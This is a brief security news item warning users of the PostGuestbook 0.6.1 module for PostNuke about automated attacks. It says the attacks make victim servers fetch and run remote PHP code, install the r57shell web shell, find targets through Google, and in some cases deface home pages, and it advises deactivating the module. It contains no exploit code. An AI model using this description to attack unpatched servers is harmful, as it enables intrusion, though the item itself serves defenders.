Automated attacks on guest book module for PostNuke
Users of the Post Guestbook guest book for PostNuke should check that their server has not fallen victim to an attack. The module appears to contain a vulnerability, through which, according to reports, automated intrusions are currently taking place. A bug in PostGuestbook appears to allow attackers to download their own PHP code from servers and execute it on the victim's server. In the case at hand, a 'PHP shell' (r57shell) is downloaded, which allows shell access via a web server. Some systems seem already to have been compromised, with at least the home page having been defaced.
The automated attack uses the Google search engine to find vulnerable servers. The referrer passed to the victims' systems suggests Arabic origins. The bug is in version 0.6.1 of the guest book, which is nearly two years old. No new version is available. Whether further conditions, such as register_globals=on, must be fulfilled for a successful attack and what these conditions might be is not known. The only known remedy at present is to deactivate the guest book module under PostNuke.